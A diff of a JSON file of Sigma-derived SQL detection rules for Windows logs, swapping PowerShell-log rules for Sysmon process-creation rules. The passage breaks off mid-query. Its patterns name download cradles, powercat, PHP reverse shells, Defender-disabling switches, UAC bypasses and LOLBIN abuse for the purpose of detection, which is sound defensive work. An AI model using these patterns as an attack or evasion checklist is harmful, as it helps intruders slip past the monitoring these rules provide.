"tags": [ - "attack.execution", - "attack.t1059.001" + "attack.t1203", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ConsoleHost' AND (HostApplication LIKE '%bxor%' ESCAPE '\\' OR HostApplication LIKE '%join%' ESCAPE '\\' OR HostApplication LIKE '%char%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%transport=dt\\_socket,address=%' ESCAPE '\\' AND (CommandLine LIKE '%jre1.%' ESCAPE '\\' OR CommandLine LIKE '%jdk1.%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%address=127.0.0.1%' ESCAPE '\\' OR CommandLine LIKE '%address=localhost%' ESCAPE '\\')))" ], - "filename": "posh_pc_xor_commandline.yml" + "filename": "proc_creation_win_java_remote_debugging.yml" }, { - "title": "Remote PowerShell Session (PS Classic)", - "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "title": "Suspicious PowerShell Parent Process", + "id": "754ed792-634f-40ae-b3bc-e0448d33f695", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a suspicious or uncommon parent processes of PowerShell", + "author": "Teymur Kheirkhabarov, Harish Segar", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Other scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%tomcat%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "posh_pc_remote_powershell_session.yml" + "filename": "proc_creation_win_powershell_susp_parent_process.yml" }, { - "title": "Suspicious PowerShell Download", - "id": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", + "title": "Suspicious Recursive Takeown", + "id": "554601fb-9b71-4bcc-abf4-21a611be4fde", "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1222.001" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Scripts created by developers and admins", + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Net.WebClient%' ESCAPE '\\' AND (HostApplication LIKE '%.DownloadFile(%' ESCAPE '\\' OR HostApplication LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\takeown.exe' ESCAPE '\\' AND CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%/r%' ESCAPE '\\')" ], - "filename": "posh_pc_susp_download.yml" + "filename": "proc_creation_win_takeown_recursive_own.yml" }, { - "title": "Tamper Windows Defender - PSClassic", - "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", - "status": "experimental", - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", - "author": "frack113", + "title": "TrustedPath UAC Bypass Pattern", + "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "status": "test", + "description": "Detects indicators of a UAC bypass method by mocking directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" ], - "filename": "posh_pc_tamper_with_windows_defender.yml" + "filename": "proc_creation_win_uac_bypass_trustedpath.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", - "id": "71ff406e-b633-4989-96ec-bc49d825a412", + "title": "OpenWith.exe Executes Specified Binary", + "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "status": "test", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "description": "The OpenWith.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Compress-Archive %' ESCAPE '\\' AND HostApplication LIKE '% -Path %' ESCAPE '\\' AND HostApplication LIKE '% -DestinationPath %' ESCAPE '\\' AND HostApplication LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" ], - "filename": "posh_pc_susp_zip_compress.yml" + "filename": "proc_creation_win_lolbin_openwith.yml" }, { - "title": "Suspicious Non PowerShell WSMAN COM Provider", - "id": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", - "status": "test", - "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "User Discovery And Export Via Get-ADUser Cmdlet", + "id": "1114e048-b69c-4f41-bc20-657245ae6e3f", + "status": "experimental", + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND ProviderName = 'WSMan' AND NOT (HostApplication LIKE '%powershell%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADUser %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" ], - "filename": "posh_pc_wsman_com_provider_no_powershell.yml" + "filename": "proc_creation_win_powershell_user_discovery_get_aduser.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", - "id": "f65e22f9-819e-4f96-9c7b-498364ae7a25", + "title": "New Network Trace Capture Started Via Netsh.EXE", + "id": "d3c3861d-c504-4c77-ba55-224ba82d0118", "status": "test", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "author": "frack113", + "description": "Detects the execution of netsh with the \"trace\" flag in order to start a network capture", + "author": "Kutepov Anton, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (HostApplication LIKE '%-ModuleName %' ESCAPE '\\' OR HostApplication LIKE '%-ModulePath %' ESCAPE '\\' OR HostApplication LIKE '%-ScriptBlock %' ESCAPE '\\' OR HostApplication LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\'))" ], - "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml" + "filename": "proc_creation_win_netsh_packet_capture.yml" }, { - "title": "Alternate PowerShell Hosts", - "id": "d7326048-328b-4d5e-98af-86e84b17c765", - "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Php Inline Command Execution", + "id": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", + "status": "experimental", + "description": "Detects execution of php using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostApplication LIKE '%' ESCAPE '\\' AND NOT (HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\' OR ContextInfo LIKE '%Citrix\\\\ConfigSync\\\\ConfigSync.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\php.exe' ESCAPE '\\' OR OriginalFileName = 'php.exe') AND CommandLine LIKE '% -r%' ESCAPE '\\')" ], - "filename": "posh_pc_alternate_powershell_hosts.yml" + "filename": "proc_creation_win_php_inline_command_execution.yml" }, { - "title": "PowerShell Downgrade Attack - PowerShell", - "id": "6331d09b-4785-4c13-980f-f96661356249", - "status": "experimental", - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "author": "Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)", + "title": "UAC Bypass Using Disk Cleanup", + "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "status": "test", + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND EngineVersion LIKE '2.%' ESCAPE '\\' AND NOT (HostVersion LIKE '2.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pc_downgrade_attack.yml" + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" }, { - "title": "Nslookup PowerShell Download Cradle", - "id": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", + "title": "Windows Update Client LOLBIN", + "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", "status": "experimental", - "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", - "author": "Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam", + "description": "Detects code execution via the Windows Update client (wuauclt)", + "author": "FPT.EagleEye Team", "tags": [ + "attack.command_and_control", "attack.execution", - "attack.t1059.001" + "attack.t1105", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%powershell%' ESCAPE '\\' AND HostApplication LIKE '%nslookup%' ESCAPE '\\' AND (HostApplication LIKE '%-q=txt%' ESCAPE '\\' OR HostApplication LIKE '%-querytype=txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "posh_pc_abuse_nslookup_with_dns_records.yml" + "filename": "proc_creation_win_wuauclt_execution.yml" }, { - "title": "Netcat The Powershell Version", - "id": "c5b20776-639a-49bf-94c7-84f912b91c15", - "status": "test", - "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "title": "Potential COM Objects Download Cradles Usage - Process Creation", + "id": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", + "status": "experimental", + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", "author": "frack113", - "tags": [ - "attack.command_and_control", - "attack.t1095" - ], "falsepositives": [ - "Unknown" + "Legitimate use of the library" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (HostApplication LIKE '%powercat %' ESCAPE '\\' OR HostApplication LIKE '%powercat.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (CommandLine LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR CommandLine LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR CommandLine LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR CommandLine LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" ], - "filename": "posh_pc_powercat.yml" + "filename": "proc_creation_win_powershell_download_com_cradles.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", - "id": "38a7625e-b2cb-485d-b83d-aff137d859f4", + "title": "Use of Pcalua For Execution", + "id": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", "status": "experimental", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "author": "frack113", + "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", + "author": "Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use by a via a batch script or by an administrator." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (ContextInfo LIKE '%-ModuleName %' ESCAPE '\\' OR ContextInfo LIKE '%-ModulePath %' ESCAPE '\\' OR ContextInfo LIKE '%-ScriptBlock %' ESCAPE '\\' OR ContextInfo LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' AND CommandLine LIKE '% -a%' ESCAPE '\\')" ], - "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml" + "filename": "proc_creation_win_lolbin_pcalua.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", - "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious HH.EXE Execution", + "id": "e8a95b5e-c891-46e2-b33a-93937d3abc31", + "status": "test", + "description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_invocation_generic.yml" + "filename": "proc_creation_win_hh_susp_execution.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", - "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", + "title": "PUA - Potential PE Metadata Tamper Using Rcedit", + "id": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", + "author": "Micah Babinski", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036.003", + "attack.t1036", + "attack.t1027.005", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool by administrators or users to update metadata of a binary" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rcedit-x64.exe' ESCAPE '\\' OR Image LIKE '%\\\\rcedit-x86.exe' ESCAPE '\\') OR Description = 'Edit resources of exe' OR Product = 'rcedit') AND CommandLine LIKE '%--set-%' ESCAPE '\\' AND (CommandLine LIKE '%OriginalFileName%' ESCAPE '\\' OR CommandLine LIKE '%CompanyName%' ESCAPE '\\' OR CommandLine LIKE '%FileDescription%' ESCAPE '\\' OR CommandLine LIKE '%ProductName%' ESCAPE '\\' OR CommandLine LIKE '%ProductVersion%' ESCAPE '\\' OR CommandLine LIKE '%LegalCopyright%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_pua_rcedit_execution.yml" }, { - "title": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", - "id": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", + "title": "HackTool - Jlaive In-Memory Assembly Execution", + "id": "0a99eb3e-1617-41bd-b095-13dc767f3def", "status": "experimental", - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "App-V clients" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.bat' ESCAPE '\\') AND ((Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%pwsh.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%+s%' ESCAPE '\\' AND CommandLine LIKE '%+h%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\')))" ], - "filename": "posh_pm_syncappvpublishingserver_exe.yml" + "filename": "proc_creation_win_hktl_jlaive_batch_execution.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", - "id": "a23791fe-8846-485a-b16b-ca691e1b03d4", + "title": "Suspicious Msiexec Execute Arbitrary DLL", + "id": "6f4191bb-912b-48a8-9ce7-682769541e6d", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.007" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%rundll32.exe%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND Payload LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND (CommandLine LIKE '% /y%' ESCAPE '\\' OR CommandLine LIKE '% -y%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\MsiExec.exe\" /Y 